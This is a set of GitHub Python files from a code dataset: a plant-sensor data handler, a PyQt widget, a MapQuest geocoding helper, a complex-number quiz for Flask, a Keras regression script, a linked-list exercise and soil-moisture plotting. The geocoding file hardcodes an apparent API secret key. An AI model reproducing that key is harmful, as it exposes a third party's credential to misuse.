\"$timestampMinute\",\n \"hour\": \"$timestampHour\"\n },\n \"value\": {\n \"$avg\": \"$analog_value\"\n }\n }\n },\n {\n \"$sort\": {\n \"_id.hour\": 1, \"_id.minute\": 1\n }\n }\n ],\n \"hourly\": [\n *common_pipeline,\n {\n \"$project\": {\n \"timestamp\": 1,\n \"timestampHour\": {\n \"$hour\": \"$timestamp\"\n },\n \"timestampDay\": {\n \"$dayOfMonth\": \"$timestamp\"\n },\n \"analog_value\": 1,\n \"moisture_level\": 1\n }\n },\n {\n \"$group\": {\n \"_id\": {\n \"hour\": \"$timestampHour\",\n \"day\": \"$timestampDay\"\n },\n \"value\": {\n \"$avg\": \"$analog_value\"\n }\n }\n },\n {\n \"$sort\": {\n \"_id.day\": 1, \"_id.hour\": 1\n }\n }\n ]\n }\n data = self.moisture_sensor_reading.aggregate(pipeline[interval])\n return list(data)\n\n def get_water_status(self, count):\n data = self.pump_water_status.find({}).sort(\"timestamp\").limit(count)\n return map(lambda x: {\"timestamp\": time.strftime('%d %b %H:%M', time.localtime(x[\"timestamp\"])), \"duration\": x[\"duration\"]}, list(data))\n","repo_name":"itachiRedhair/smart-plant","sub_path":"web/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":6093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16116202386","text":"from 
PyQt4.QtGui import QTextEdit, QSizePolicy, QWidget\nfrom PyQt4.QtCore import QSize\nfrom lunchinator.log.logging_slot import loggingSlot\n\nclass GrowingTextEdit(QTextEdit):\n def __init__(self, parent, heightMax = 1000):\n super(GrowingTextEdit, self).__init__(parent) \n self.document().contentsChanged.connect(self.sizeChange)\n\n self.heightMin = 0\n self.heightMax = heightMax\n self.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Maximum)\n self.sizeChange()\n\n def resizeEvent(self, event):\n self.sizeChange()\n return super(GrowingTextEdit, self).resizeEvent(event)\n\n def setDocHeight(self, height):\n self.setMinimumHeight(height)\n self.setMaximumHeight(height)\n\n @loggingSlot()\n def sizeChange(self):\n docHeight = self.document().size().height()\n if self.heightMin <= docHeight <= self.heightMax:\n self.setDocHeight(docHeight + 2)\n elif docHeight < self.heightMin:\n self.setDocHeight(self.heightMin)\n else:\n self.setDocHeight(self.heightMax)\n \n def setVisible(self, *args, **kwargs):\n QTextEdit.setVisible(self, *args, **kwargs)\n self.sizeChange()\n \n def sizeHint(self):\n return QSize(QWidget.sizeHint(self).width(), self.minimumHeight())\n \n","repo_name":"hannesrauhe/lunchinator","sub_path":"lunchinator/growing_text_edit.py","file_name":"growing_text_edit.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30181690596","text":"import requests\n\n# for getting the coordinates of a particular address, the MapQuest API is used\n\n# API Secret Key\ncoordinateApiKey = \"zQ85GG9vCz4xzvnERTYULLpsseGstaok\"\n\n# API endpoint with query ?location=\ncoordinateApi = f\"http://www.mapquestapi.com/geocoding/v1/address?key={coordinateApiKey}&location=\"\n\n\n# It returns the address information, including coordinates, for the given address.\n# It takes the address fields as parameters and uses them as the location query for the API\n# (the name parameter is currently unused).\n\ndef getCoordinate(name, addressLine, city, state):\n mainCoordinateApi = f\"{coordinateApi}{addressLine},{city},{state}\"\n r = requests.get(mainCoordinateApi)\n locationData = r.json()[\"results\"][0][\"locations\"][0]\n return locationData","repo_name":"DhamaniSaranya/Address-Book-FastApi","sub_path":"app/get_Coordinates.py","file_name":"get_Coordinates.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35874403189","text":"#Task 2\npl = int(input('Number of plates: '))\nsr = int(input('Amount of dish soap: '))\ni = 0\nwhile sr > 0:\n pl = pl - 1\n sr = sr - 0.5\n i = i + 1\n\n print('Washed', i, 'plates. Soap left:', sr)\n\n if pl == 0:\n break\n\nprint('The dish soap ran out. Unwashed plates left:', pl) if pl > 0 else print('All plates are washed. Unused soap left:', sr)\n","repo_name":"MNaugolnov/hw","sub_path":"hw1-2.py","file_name":"hw1-2.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73636332587","text":"#!/usr/bin/env python2\n# -*- coding: UTF-8 -*-\n\"\"\"\n Complexity: quizzes/the_modulus.py\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n Contains a quiz implementation (`Quiz`) for the modulus topic.\n\n\"\"\"\n\nimport random\n\nfrom flask import request\n\nfrom . 
import BaseQuiz\nfrom ..maths import *\nfrom ..maths.complex import (compute_modulus, compute_product,\n compute_divide)\nfrom ..errors import BadRequestError\n\nclass DuplicateAnswerError(Exception):\n pass\n\nclass MultipleChoiceQuestion(object):\n \"\"\"\n Inherited by questions with a multiple choice structure.\n\n Each question has three parts. For each part, a choice of\n three answers is provided; a correct one and two wrong ones.\n\n Once inherited the child class has to define the following\n instance varibles:\n\n :ivar data: Dictionary of variable definitions needed to answer\n the question.\n\n :ivar parts: A list of `tuple`s for each part of the question.\n The first element being the `MathOperand`\n representing the question and the second a list of\n `MathOperand`s containing the correct answer\n followed by two incorrect answers.\n \"\"\"\n def __init__(self):\n self.answered = False\n self.score = 0\n self.results = []\n\n # Cache Question.\n try:\n self.question\n except DuplicateAnswerError:\n self.__dict__ = {}\n self.__init__()\n\n @staticmethod\n def _make_part(part):\n \"\"\"\n Renders an randomises part and puts it into the correct\n format to be sent.\n\n :param part: A `tuple`, from `self.parts`.\n\n :returns: A `tuple` containing the rendered question, a\n shuffled list of the answers rendered and\n the index of the correct answer in that list.\n \"\"\"\n question, answers = part\n\n # Render the question.\n question = question.render()\n # Render the possible answers.\n answers = map(lambda expr: str(expr.render()), answers)\n\n if len(answers) != len(set(answers)):\n raise DuplicateAnswerError\n\n # Take out the correct answer.\n correct_answer = answers.pop(0)\n # Choose a random index.\n correct_answer_index = random.randrange(0, 3)\n # Place the correct answer in at that random index.\n answers.insert(correct_answer_index, correct_answer)\n\n return question, answers, correct_answer_index\n\n @property\n def question(self):\n \"\"\"\n :returns: A `tuple` of all `self.parts` rendered and ready\n to be sent.\n \"\"\"\n\n # Only generate if they have not been generated before.\n if not hasattr(self, '_question'):\n self._question = map(self._make_part, self.parts)\n\n return self._question\n\n def ask(self):\n \"\"\"\n :returns: The whole question to be asked with data.\n \"\"\"\n return dict(\n data=self.data,\n question=self.question\n )\n\n def answer(self, request_data):\n \"\"\"\n Answer the question.\n\n :param request_data: A dictionary containing the loaded\n data from JSON inside the request.\n\n :returns: The total score and results for the question.\n \"\"\"\n if self.answered:\n raise ValueError\n\n # Get the answer data.\n answer = request_data['answer']\n\n # Process each part.\n for i in xrange(len(self.parts)):\n\n correct = answer[i][0] == self._question[i][2]\n\n # Save result.\n self.results.append(correct)\n\n # If correct add 5 to the score.\n if correct:\n self.score += 5\n\n self.answered = True\n return self.score, self.results\n\n\nclass ModulusProductQuestion(MultipleChoiceQuestion):\n \"\"\"\n Question for the modulus's product.\n \"\"\"\n def __init__(self, *args, **kwargs):\n # Variables used to represent questions.\n self.z_var = MathsVariable('z')\n self.w_var = MathsVariable('w')\n self.zw_var = MathsExpression([\n self.z_var,\n self.w_var\n ],\n operators.multiply\n )\n\n # Per-Question random variable definitions.\n self.z = MathsComplexNumber(\n MathsRandomConstant(1, 11),\n MathsRandomConstant(1, 11)\n )\n self.w = 
MathsComplexNumber(\n MathsRandomConstant(1, 11),\n MathsRandomConstant(1, 11)\n )\n self.zw = compute_product(self.z, self.w)\n\n # Required `MultipleChoiceQuestion` instance varibles.\n self.data = dict(z=self.z.render(), w=self.w.render())\n self.parts = [self.part_one, self.part_two, self.part_three]\n\n # Call the inherited class's __init__\n super(ModulusProductQuestion, self).__init__(*args, **kwargs)\n\n @property\n def part_one(self):\n \"\"\"\n Part one of the question. What is 'zw'?\n \"\"\"\n\n # The answers are placed in a functions\n # to clearly separate the logic from the question.\n\n def answers():\n\n # Compute vars for random number generation.\n # For both the real part...\n step_re = int(self.zw.re * 0.1)\n if step_re < 1:\n step_re = 1\n start_re = int(self.zw.re - step_re*10)\n end_re = int(self.zw.re + step_re*10)\n\n # ....and imaginary part.\n step_im = int(self.zw.im * 0.1)\n if step_im < 1:\n step_im = 1\n start_im = int(self.zw.im - step_im*10)\n end_im = int(self.zw.im + step_im*10)\n\n # Generate wrong answers.\n wrong_answers = [\n MathsComplexNumber(\n MathsRandomConstant(start_re, end_re, step_re),\n MathsRandomConstant(start_im, end_im, step_im)\n ) for _ in xrange(2)\n ]\n\n return [self.zw] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_one'):\n # question = 'zw'\n question = self.zw_var\n\n self._part_one = question, answers()\n \n return self._part_one\n\n @property\n def part_two(self):\n \"\"\"\n Part two of the question. What is '|zw|'?\n \"\"\"\n\n # The question and answers are placed in different functions\n # to clearly separate the logic for each.\n\n def answers():\n zw_mod = compute_modulus(self.zw)\n\n # Remove the square root.\n zw_mod_squared = zw_mod.operands[0]\n\n # Compute vars for random number generation.\n step = int(zw_mod_squared.render() * 0.1)\n if step < 1:\n step = 1\n start = int(zw_mod_squared.render() - step*10)\n end = int(zw_mod_squared.render() + step*10)\n\n # Generate random numbers.\n wrong_answers = [\n MathsExpression(\n MathsRandomConstant(start, end, step),\n operators.sqrt\n ) for _ in xrange(2)\n ]\n\n return [zw_mod] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_two'):\n # question = '|zw|'\n question = MathsExpression(\n self.zw_var,\n operators.abs\n )\n\n self._part_two = question, answers()\n\n return self._part_two\n\n @property\n def part_three(self):\n \"\"\"\n Part three of the question. What is '|z||w|'?\n\n NOTE: There is a pattern here that the user might detect,\n and solve this question quicker. Basically the\n answer to this is the same as `self.part_two` because\n |zw| = |z||w|. 
It is down to the quiz object to\n detect this, then the `self.pattern` method can be\n used.\n \"\"\"\n\n # The question and answers are placed in different functions\n # to clearly separate the logic for each.\n\n def question():\n # |z|\n z_mod_var = MathsExpression([\n MathsVariable('z'),\n ], operators.abs\n )\n # |w|\n w_mod_var = MathsExpression([\n MathsVariable('w'),\n ], operators.abs\n )\n\n # |z||w|\n return MathsExpression([\n z_mod_var, w_mod_var\n ], operators.multiply\n )\n\n def answers():\n # |a + bj| = sqrt(a*a + b*b)\n z_mod = compute_modulus(self.z)\n w_mod = compute_modulus(self.w)\n\n # |a + bj|^2 = a*a + b*b.\n z_mod_squared = z_mod.operands[0]\n w_mod_squared = w_mod.operands[0]\n\n # |a + bj|^2 |c + dj|^2 = (a*a + b*b)(c*c + d*d)\n z_mod_squared_w_mod_squared = MathsConstant(\n z_mod_squared.render() * w_mod_squared.render()\n )\n\n # |a + bj||c + dj| = sqrt[ (a*a + b*b) (c*c + d*d) ]\n z_mod_w_mod = MathsExpression(\n z_mod_squared_w_mod_squared,\n operators.sqrt\n )\n\n # Compute vars for random numbers.\n step = int(z_mod_squared_w_mod_squared.render() * 0.1)\n if step < 1:\n step = 1\n start = int(z_mod_squared_w_mod_squared.render() - step*10)\n end = int(z_mod_squared_w_mod_squared.render() + step*10)\n\n # Generate wrong answers.\n wrong_answers = [\n MathsExpression(\n MathsRandomConstant(start, end, step),\n operators.sqrt\n ) for _ in xrange(2)\n ]\n\n return [z_mod_w_mod] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_three'):\n self._part_three = question(), answers()\n\n return self._part_three\n\n def pattern(self, user_answer=None):\n \"\"\"\n Ask about the pattern in the question.\n\n :param user_answer: The user's answer.\n\n :returns: Possible answers or, if `user_answer` is provided,\n whether the user is correct.\n \"\"\"\n # Helper function\n equal = lambda exp1, exp2: '{} = {}'.format(exp1.render(),\n exp2.render())\n\n # A few algebraic expressions.\n z_mod_var = MathsExpression(self.z_var, operators.abs)\n w_mod_var = MathsExpression(self.w_var, operators.abs)\n z_mod_w_mod_var = MathsExpression([\n z_mod_var,\n w_mod_var\n ])\n zw_mod_var = MathsExpression(self.zw_var, operators.abs)\n\n # The possible answers\n correct_answer = equal(zw_mod_var, z_mod_w_mod_var)\n incorrect_answer_one = equal(z_mod_var, w_mod_var)\n incorrect_answer_two = equal(z_mod_var, zw_mod_var)\n\n # If answering the question return the result.\n if user_answer is not None:\n return correct_answer == user_answer\n\n # Shuffle answers.\n answers = [\n correct_answer,\n incorrect_answer_one,\n incorrect_answer_two\n ]\n random.shuffle(answers)\n\n return answers\n\n\nclass ModulusDivisionQuestion(MultipleChoiceQuestion):\n \"\"\"\n Question for division with the modulus.\n \"\"\"\n def __init__(self, *args, **kwargs):\n # Variables used to represent questions.\n self.z_var = MathsVariable('z')\n self.w_var = MathsVariable('w')\n self.z_div_w_var = MathsExpression([\n self.z_var,\n self.w_var\n ],\n operators.divide\n )\n\n # Per-Question random variable definitions.\n self.z = MathsComplexNumber(\n MathsRandomConstant(1, 11),\n MathsRandomConstant(1, 11)\n )\n self.w = MathsComplexNumber(\n MathsRandomConstant(1, 11),\n MathsRandomConstant(1, 11)\n )\n self.z_div_w = compute_divide(self.z, self.w)\n\n # Required `MultipleChoiceQuestion` instance varibles.\n self.data = dict(z=self.z.render(), w=self.w.render())\n self.parts = [self.part_one, self.part_two, 
self.part_three]\n\n # Call the inherited class's __init__\n super(\n ModulusDivisionQuestion,\n self\n ).__init__(*args, **kwargs)\n\n @property\n def part_one(self):\n \"\"\"\n Part one of the question. What is 'z / w'?\n \"\"\"\n\n # The answers are placed in a functions\n # to clearly separate the logic from the question.\n\n def answers():\n\n # Compute vars for random number generation.\n # For both the real part...\n step_re = int(self.z_div_w.re)\n if step_re < 1:\n step_re = 1\n start_re = int(self.z_div_w.re - step_re*10)\n end_re = int(self.z_div_w.re + step_re*10)\n\n # ....and imaginary part.\n step_im = int(self.z_div_w.im)\n if step_im < 1:\n step_im = 1\n start_im = int(self.z_div_w.im - step_im*10)\n end_im = int(self.z_div_w.im + step_im*10)\n\n # Generate wrong answers.\n wrong_answers = [\n MathsComplexNumber(\n MathsRandomConstant(start_re, end_re, step_re),\n MathsRandomConstant(start_im, end_im, step_im)\n ) for _ in xrange(2)\n ]\n\n return [self.z_div_w] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_one'):\n # question = 'z / w'\n question = self.z_div_w_var\n\n self._part_one = question, answers()\n\n return self._part_one\n\n @property\n def part_two(self):\n \"\"\"\n Part two of the question. What is '|z / w|'?\n \"\"\"\n\n # The question and answers are placed in different functions\n # to clearly separate the logic for each.\n\n def answers():\n z_div_w_mod = compute_modulus(self.z_div_w)\n\n # Remove the square root.\n z_div_w_mod_squared = z_div_w_mod.operands[0]\n\n # Compute vars for random number generation.\n step = int(z_div_w_mod_squared.render())\n if step < 1:\n step = 1\n start = int(z_div_w_mod_squared.render() - step*10)\n end = int(z_div_w_mod_squared.render() + step*10)\n\n # Generate random numbers.\n wrong_answers = [\n MathsExpression(\n MathsRandomConstant(start, end, step),\n operators.sqrt\n ) for _ in xrange(2)\n ]\n\n return [z_div_w_mod] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_two'):\n # question = '|zw|'\n question = MathsExpression(\n self.z_div_w_var,\n operators.abs\n )\n\n self._part_two = question, answers()\n\n return self._part_two\n\n @property\n def part_three(self):\n \"\"\"\n Part three of the question. What is '|z| / |w|'?\n\n NOTE: There is a pattern here that the user might detect,\n and solve this question quicker. Basically the\n answer to this is the same as `self.part_two` because\n |z/w| = |z|/|w|. 
It is down to the quiz object to\n detect this, then the `self.pattern` method can be\n used.\n \"\"\"\n\n # The question and answers are placed in different functions\n # to clearly separate the logic for each.\n\n def question():\n # |z|\n z_mod_var = MathsExpression([\n MathsVariable('z'),\n ], operators.abs\n )\n # |w|\n w_mod_var = MathsExpression([\n MathsVariable('w'),\n ], operators.abs\n )\n\n # |z| / |w|\n return MathsExpression([\n z_mod_var, w_mod_var\n ], operators.divide\n )\n\n def answers():\n correct = self.part_two[1][0]\n correct_squared = correct.operands[0]\n\n # Compute vars for random numbers.\n step = int(correct_squared.render())\n if step < 1:\n step = 1\n start = int(correct_squared.render() - step*10)\n end = int(correct_squared.render() + step*10)\n\n # Generate wrong answers.\n wrong_answers = [\n MathsExpression(\n MathsRandomConstant(start, end, step),\n operators.sqrt\n ) for _ in xrange(2)\n ]\n\n return [correct] + wrong_answers\n\n # Only compute once as the same contents must be returned\n # for the same question instance.\n if not hasattr(self, '_part_three'):\n self._part_three = question(), answers()\n\n return self._part_three\n\n def pattern(self, user_answer=None):\n \"\"\"\n Ask about the pattern in the question.\n\n :param user_answer: The user's answer.\n\n :returns: Possible answers or, if `user_answer` is provided,\n whether the user is correct.\n \"\"\"\n # Helper function\n equal = lambda exp1, exp2: '{} = {}'.format(exp1.render(),\n exp2.render())\n\n # A few algebraic expressions.\n z_mod_var = MathsExpression(self.z_var, operators.abs)\n w_mod_var = MathsExpression(self.w_var, operators.abs)\n z_mod_div_w_mod_var = MathsExpression([\n z_mod_var,\n w_mod_var\n ], operators.divide)\n z_div_w_mod_var = MathsExpression(self.z_div_w_var, operators.abs)\n\n # The possible answers\n correct_answer = equal(z_div_w_mod_var, z_mod_div_w_mod_var)\n incorrect_answer_one = equal(z_mod_var, w_mod_var)\n incorrect_answer_two = equal(z_mod_var, z_div_w_mod_var)\n\n # If answering the question return the result.\n if user_answer is not None:\n return correct_answer == user_answer\n\n # Shuffle answers.\n answers = [\n correct_answer,\n incorrect_answer_one,\n incorrect_answer_two\n ]\n random.shuffle(answers)\n\n return answers\n\n\nclass PatternState(object):\n \"\"\"\n Enum like object for representing the state of patterns being\n spotted.\n \"\"\"\n\n not_spotted, spotted, confirmed = range(3)\n\n\nclass Quiz(BaseQuiz):\n \"\"\"\n The Modulus Quiz.\n\n Contents:\n ModulusProductQuestion * 3,\n ModulusDivisionQuestion * 3\n\n \"\"\"\n def __init__(self):\n self.questions = [\n (ModulusProductQuestion, 3),\n (ModulusDivisionQuestion, 3)\n ]\n self.repeat_limit = 0\n self.repeat_count = 0\n self.score = 0\n self.prev_resp_time = None\n self.pattern = PatternState.not_spotted\n super(Quiz, self).__init__()\n\n def next(self, json=None):\n \"\"\"\n Handle request to '/the_modulus/_next'.\n \"\"\"\n if self.pattern == PatternState.not_spotted and\\\n self.question is None:\n return self.finish()\n\n # Separate GET and POST requests.\n return {\n 'GET': self.get_question,\n 'POST': self.answer_question,\n }[request.method](json)\n\n @property\n def question(self):\n # Check if there is still a question loaded that has not been\n # answered.\n if hasattr(self, '_question'):\n if not self._question.answered or self.pattern != PatternState.not_spotted:\n return self._question\n\n # Check if the current question type is finished or needs to\n # be repeated.\n 
if not hasattr(self, '_Question') or self.repeat_count >= self.repeat_limit:\n\n if len(self.questions) == 0:\n # Finished!\n return None\n\n # Go to next question type.\n self.repeat_count = 0\n self.prev_resp_time = None\n self.pattern = PatternState.not_spotted\n self._Question, self.repeat_limit = self.questions.pop(0)\n\n # Create new instance of `self._Question` at `self._question`\n self.repeat_count += 1\n self._question = self._Question()\n return self._question\n\n def get_question(self, _=None):\n \"\"\"\n Handle: GET /the_modulus/_next\n \"\"\"\n\n # As error message says below.\n if self.pattern != PatternState.not_spotted:\n raise BadRequestError(\n \"Can't get more questions until the pattern has \" +\n \"been processed.\"\n )\n\n response = self.question.ask()\n response['finish'] = False\n return response\n\n def answer_question(self, json):\n \"\"\"\n Handle: POST /the_modulus/_next\n \"\"\"\n\n # Data is needed when answering a question.\n if json is None:\n raise BadRequestError(\"No data!\")\n\n # When a pattern is spotted.\n if self.pattern != PatternState.not_spotted:\n\n # If the user says they know the pattern.\n if self.pattern == PatternState.confirmed:\n\n # If correct they get all the remaining points plus\n # an additional 5.\n score = 5 + (\n (self.repeat_limit - self.repeat_count) *\n len(self.question.parts) * 5\n )\n\n if 'answer' not in json:\n raise BadRequestError('Expected answer.')\n\n # If correct they get the points.\n if self._question.pattern(json['answer']):\n self.score += score\n\n # Else they lose all remaining points.\n\n # Either way, go to the next question.\n self.pattern = PatternState.not_spotted\n self.repeat_count = self.repeat_limit\n\n return dict(score=self.score)\n\n # The only other option is that they are confirming whether or\n # not they know the pattern.\n if json.get('spotted', False):\n # If they say they know the pattern, return the\n # pattern question.\n self.pattern = PatternState.confirmed\n return dict(patterns=self.question.pattern())\n\n # So they don't yet know the pattern.\n self.pattern = PatternState.not_spotted\n return {}\n\n # By this point a question is being answered. 
If not, something has\n # gone wrong.\n if 'answer' not in json:\n raise BadRequestError('Expected answer.')\n\n # Answer question.\n score, results = self.question.answer(json)\n self.score += score\n\n # A pattern may have been spotted if the response time is\n # less than the previous.\n resp_time = json['answer'][-1][1]\n if self.prev_resp_time is not None and results[-1]:\n if resp_time < self.prev_resp_time:\n self.pattern = PatternState.spotted\n\n # Save previous response time to last question if correct.\n self.prev_resp_time = resp_time if results[-1] else None\n\n return dict(\n score=self.score,\n spotted=self.pattern\n )\n\n def finish(self, name=None):\n \"\"\"\n Finish quiz, save scores\n \"\"\"\n self.ended = True\n if name is None:\n return dict(finish=True)\n\n return (self.score, name)\n\n\n\n","repo_name":"stlukey/Complexity","sub_path":"complexity/quizzes/the_modulus.py","file_name":"the_modulus.py","file_ext":"py","file_size_in_byte":24203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31827045328","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 20 16:55:17 2017\n\n@author: Stein\n\"\"\"\n\n# Import the libraries\nprint ('[INFO] loading computational backend...')\nimport numpy as np\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import r2_score\n\n\n# Importing the dataset\ndataset = pd.read_csv('50_Startups.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 4].values\n\n# Encoding categorical data\n# Encoding the Independent Variable\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_X = LabelEncoder()\nX[:, 3] = labelencoder_X.fit_transform(X[:, 3])\nonehotencoder = OneHotEncoder(categorical_features = [3])\nX = onehotencoder.fit_transform(X).toarray()\n\n# Splitting the dataset into Training set and Test set\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, \n random_state = 0)\n\n\n# Define the base model\ndef baseline_model():\n # Create the model\n model = Sequential()\n \n model.add(Dense(6, input_dim = 6, \n kernel_initializer = 'normal',\n activation = 'relu'))\n \n model.add(Dense(1, kernel_initializer = 'normal'))\n \n # Compile the model\n model.compile(loss = 'mean_squared_error', optimizer = 'adam')\n return model\n\ndef large_model():\n # Create the model : 6 inputs -> [13 -> 6] -> 1 output\n model = Sequential()\n \n model.add(Dense(6, input_dim = 6, \n kernel_initializer = 'normal',\n activation = 'relu'))\n \n model.add(Dense(6, \n kernel_initializer = 'normal',\n activation = 'relu'))\n \n model.add(Dense(1, kernel_initializer = 'normal'))\n \n # Compile the model\n model.compile(loss = 'mean_squared_error', optimizer = 'adam')\n return model\n\ndef wide_model():\n # Create the model : 6 inputs -> [20] -> 1 output\n model = Sequential()\n \n model.add(Dense(20, input_dim = 6, \n kernel_initializer = 'normal',\n activation = 'relu'))\n \n model.add(Dense(1, kernel_initializer = 'normal'))\n \n # Compile the model\n model.compile(loss = 'mean_squared_error', optimizer = 'adam')\n return model\n\ndef wide_large_model():\n # Create the model : 6 inputs -> [20 -> 6] 
-> 1 output\n    model = Sequential()\n    \n    model.add(Dense(20, input_dim = 6, \n                    kernel_initializer = 'normal',\n                    activation = 'relu'))\n    \n    model.add(Dense(6, \n                    kernel_initializer = 'normal',\n                    activation = 'relu'))\n    \n    model.add(Dense(1, kernel_initializer = 'normal'))\n    \n    # Compile the model\n    model.compile(loss = 'mean_squared_error', optimizer = 'adam')\n    return model\n\n\n\n# Evaluate the model with non-standardized dataset\nestimator = KerasRegressor(build_fn = large_model,\n                           nb_epoch = 100,\n                           batch_size = 5,\n                           verbose = 1)\n\nestimator.fit(X_train, y_train, batch_size = 5, epochs = 100)\n\ny_pred = estimator.predict(X_test)\n\n# Evaluate model performance\nscore = r2_score(y_test, y_pred)\n\n\n\n# Evaluate the model with standardized dataset - baseline model\nprint ('Evaluating baseline model - standardized data...')\nestimators = []\nestimators.append(('standardize', StandardScaler()))\nestimators.append(('mlp', KerasRegressor(build_fn = baseline_model,\n                                         epochs = 50,\n                                         batch_size = 5,\n                                         verbose = 1)))\npipeline = Pipeline(estimators)\n\nkfold = KFold(n_splits = 10, random_state = 0)\nresults = cross_val_score(pipeline, X, y, cv = kfold)\nkfold_mlp_mean = results.mean()\nkfold_mlp_std = results.std()","repo_name":"steincastillo/ML-Reference","sub_path":"regression_mlp_esc_v2.py","file_name":"regression_mlp_esc_v2.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22111109650","text":"'''\nAdapted from 조민규's Flask_Large_Application_Example, which I found interesting and decided to use.\n'''\nfrom termcolor import colored\n\ndef log(message: str, keyword: str=\"WARN\"):\n    if keyword == \"WARN\":\n        print(colored('[WARN]', 'yellow'), message)\n    elif keyword == \"ERROR\":\n        print(colored('[ERROR] ' + message, 'red'))\n    elif keyword == \"INFO\":\n        print(colored('[INFO]', 'blue'), message)\n    else:\n        print(colored('[{}]'.format(keyword), 'cyan'), message)","repo_name":"team-requin/ReQuiz_Backend","sub_path":"app/misc/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37704337559","text":"from LinkedListImpl import ListNode\nfrom LinkedListImpl import createLinkedList\n\ndef hasCycle(head):\n    \"\"\"\n    :type head: ListNode\n    :rtype: bool\n    \"\"\"\n    if head is None:\n        return False\n\n    slow = head\n    fast = head\n\n    while fast and fast.next:\n        fast, slow = fast.next.next, slow.next\n        if fast == slow:\n            return True\n    \n    return False\n\nif __name__ == \"__main__\":\n    arr = [3,2,0,-4]\n    l = createLinkedList(arr)\n    print(arr)\n    print(l.linkedListToString())\n    print(l.hasCycle())\n    c = l.createCycle(1)\n    print(l.hasCycle())","repo_name":"zZestyy/LeetCode","sub_path":"blind75/linked-list/141-LinkedListCycle.py","file_name":"141-LinkedListCycle.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30969494690","text":"import tifffile\nimport os\nfrom scipy import stats, optimize, interpolate\nimport matplotlib.pyplot as plt \nimport numpy as np \nimport matplotlib.dates as mdates\nimport datetime as dt\n\ndef compare_sm_am(value):\n    return value[0] > 0 and (value[2] == 0 or value[2] == 8)\ndef compare_sm_pm(value):\n    return value[1] > 0 and (value[3] == 0 or value[3] == 8)\ndef compare_lst_day(value):\n    return value[5] != 0 and value[7] != 0\ndef compare_lst_night(value):\n    return value[4] != 0 
and value[6] != 0\ndef compare(typ, val):\n    if typ == \"soil_moisture_am\":\n        return compare_sm_am(val)\n    if typ == \"soil_moisture_pm\":\n        return compare_sm_pm(val)\n    if typ == \"lst_day\":\n        return compare_lst_day(val)\n    if typ == \"lst_night\":\n        return compare_lst_night(val)\n    return False\n\ntypes = {\n    \"soil_moisture_am\":0,\n    \"soil_moisture_pm\":1,\n    \"lst_day\":5,\n    \"lst_night\":4,\n}\ndef get_time_series(typ, state, i, j, scale):\n    layer = types[typ]\n    data_x = []\n    data_y = []\n    for date in sorted(os.listdir(\"data\")):\n        if True:\n            img = tifffile.imread(\"data/\" + date + \"/\" + state + \"_\" + date + \".tif\")\n            if len(img[i][j]) == 8 and compare(typ, img[i][j]):\n                data_y.append(img[i][j][layer]*scale)\n            else:\n                data_y.append(np.nan)\n            data_x.append(dt.datetime.strptime(date,'%Y-%m-%d').date())\n        else:\n            print(\"error\")\n    plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%m/%d/%Y'))\n    plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=100)) \n    plt.scatter(data_x, data_y)\n    plt.title(typ + \" \" + state + \" for i: \" + str(i) + \" and j: \" + str(j))\n    plt.gcf().autofmt_xdate()\n    plt.savefig(typ + '_time_series/' + state + '_' + str(i) + '_' + str(j) + '.png') \n    plt.clf()\nillinois_grids = [(10,20),(14,34),(19,32),(30,30),(31,41)]\noklahoma_grids = [(10,20),(11,41),(19,24),(19,35),(26,38)]\n\nget_time_series('soil_moisture_am','illinois',27,40, .02)\nget_time_series('soil_moisture_pm','illinois',27,40, .02)\nfor grid in illinois_grids:\n    \"\"\"get_time_series('soil_moisture_am','illinois',grid[0],grid[1], 1)\n    get_time_series('soil_moisture_pm','illinois',grid[0],grid[1], 1)\n    get_time_series('lst_day','illinois',grid[0],grid[1], .02)\"\"\"\n    get_time_series('lst_night','illinois',grid[0],grid[1], .02)\n\"\"\"for grid in oklahoma_grids:\n    get_time_series('soil_moisture_am','oklahoma',grid[0],grid[1], 1)\n    get_time_series('soil_moisture_pm','oklahoma',grid[0],grid[1], 1)\n    get_time_series('lst_day','oklahoma',grid[0],grid[1], .02)\n    get_time_series('lst_night','oklahoma',grid[0],grid[1], 